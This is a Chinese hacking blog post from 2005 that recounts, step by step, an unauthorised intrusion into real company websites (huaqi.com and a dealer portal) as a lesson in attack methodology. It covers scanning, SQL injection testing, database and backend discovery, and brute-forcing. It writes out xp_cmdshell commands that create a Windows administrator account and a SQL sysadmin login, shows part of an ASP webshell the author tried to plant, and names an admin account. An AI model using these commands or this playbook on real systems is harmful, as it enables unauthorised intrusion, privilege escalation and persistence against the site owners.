|
 |
学会总结入侵思路(实战篇) |
|
 |
很多入侵方式,大家都看过,也都知道。但是真正入侵时,你是否会想起你所会的所有入侵的思路呢? 重点是入侵网站要多思考,多实验,还有不断的在平时充实自己。 安全在线的技术文章以及黑客入侵图文教程,你是否都看过呢?是否认为里面没什么技术含量?都很垃圾呢?关键在于总结,很多文章都很普通,但是里面有很多思路。安全在线 www.cnsafer.com 每天都更新.你都看过,并且都掌握了,还要能学有所用。那么你也不会只是在行列了。 介绍1个我入侵时间最长的网站. 也是介绍点思路给大家.关于从哪入手入侵站. 一日看电脑报介绍数码产品. 介绍这个站www.huaqi.com 是生产aigo品牌的厂商华旗资讯 首先要想到这个站是什么类型的站. 打开http://www.huaqi.com/index.asp 打开看程序是asp的
第1步 就是用X-SCAN扫1下看服务器开什么端口漏洞 结果1无所获
第2步 是注入了 www.huaqi.com/news/viewnews.asp?id=2259 试下 www.huaqi.com/news/viewnews.asp?id=2259' and 1=1 and 1=2 不行注入不了 接着检查所有的asp?id这样的连接一遍 还是没有注入点. 第3步 看能不能爆库
2级目录 /替换%5c www.huaqi.com/news%5cviewnews.asp?id=2259 找不到数据库,也不想到用插入1句马的方法了 还是不行
第4步 看到在线服务里有个论坛 版本: LB5000XP v0403 找了1下 .cgi的没有到下手点
第5步 穷举1下 看看各个主要目录下有没有upfile.asp或upload.asp等上传常用名字文件. 都找了1边没找到
第6步 用工具扫扫后台 扫了又扫,还是没有结果
第7个想法 旁注1下 用domain扫了1下有4个域名但是没有常见上传漏洞、后台、数据库。 也没扫到注入点.也没有可以爆库的地方. 不要太相信工具还是手动1个1个找找吧. www.huaqi.com www.aigo.com 和huaqi.com是1个内容 www.aigoresearch.com 都是html单页面 www.huaqidaili.com 这里只有1个登陆口 没帐号密码还进不去 到这里了,要放弃吗?不.
第8步 发现DVBBS,被成漏洞最多的论坛 。 进http://www.huaqidaili.com随便输入个帐号密码 进到1个论坛提示密码错误又返回这个页面 看到他是DVBBS 我们直接进http://www.huaqidaili.com/bbs 进来了,试试默认管理员帐号密码,默认数据库,upfile.asp 和动网的一些插件,试图1句话的马,可是1无所获. 这时看到Powered By :Dvbbs Version 7.0.0 Sp2 sql他是sql数据库 一般这样的就更难了,他还没开放注册用户。 在他论坛转了转,发现管理员ID,试1下穷举密码吧。 唉还是不可以...这时想到了放弃...
第9步 用搜索引擎来帮助我们 一般大站安全都比较高,不过他内容也多,带来的隐患也就更多。 去www.baidu.com搜索1下site:www.huaqidaili.com 看看他这个站下到底有什么内容.不会只有1个论坛. 找到相关网页约5,560篇 果然还有其他的,找到1个连接 www.huaqidaili.com/expire/news/show.asp?stri=1571 进去看1下代理商平台 asp?看到这样的 第1个想法还是注入了 试下果然可以注入了.居然sa权限.sql数据库、 用domain可以执行DOS命令,执行sql命令.我都试过了。 用命令建立过管理员帐号密码, exec xp_cmdshell 'net user badwolf 123456 /add' exec xp_cmdshell 'net localGroup Administrators badwolf /add' 用HDSI开了3389提示成功。结果连不上。 还建立了sql数据库的权限 exec master..sp_addlogin badwolf,123456 exec master..sp_addsrvrolemember badwolf,sysadmin 连接1433端口还是连不上 建立完了连不上,再扫1下服务器IP只开80端口.估计是内网映射.
这时我1个用到了domain的mssql辅助工具的列目录找到他网站存放文件的目录. 在d:\huaqi下是www.huaqi.com的目录 试着写入1下 xp_cmdshell 我们最常用的上传木马 上传到D:\huaqi\up.asp 建立新的文件 选择“追加” <% dim objFSO %> <% dim fdata %> <% dim objCountFile %> <% on error resume next %> ....... <% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %> <% Response.write "<input type=submit value=保存>" %> <% Response.write "</form>" %> 结果没有成功 什么也没写入进去
然后换下wscript.shell同样方法上传上去了 up.asp 结果上传上去的文件少了 <% %>这写主要内容 木马没什么用 就是1个普通写字版.
还是夸库 扫他数据库吧 找到网站管理员密码 扫到1写admin表 把密码都记录下来 在找他后台吧.用domain的列目录功能.1个目录1个目录试吧.. 找到几个后台 d:\huaqi\international\back_adm _adm/main.asp">http://www.huaqi.com/international/back_adm/main.asp 这是1个后台 猜到数据库猜到密码登陆, admin_name:f6 admin_password:*********** 登陆进去里面有上传文件的地方, 登陆后,试图上传1下木马格式的文件asa asp cer cdx jsp php cgi能试的都试1边 还是不可以 上传1个图片 用WSockExpert.exe截1下cookies 上传1下试试 还是不行 不找了,脑袋都迷糊了.用上传工具传个几个文字算了,提示1下他的漏洞. www.huaqi.com/hack.asp 文章也写到这里了...主要是告诉大家,要多思路而已. 哪位接着测试就测试吧...建议大家不要修改人家数据. 我国内站数不胜数,1次没改过人家首页,也没删除过别人数据,也没挂过马. 学习这些知识是更好的充实自己,而不是破坏.
哈哈 发表于 2005-6-19 [所属栏目: 黑客 | 返回首页]
|
|
|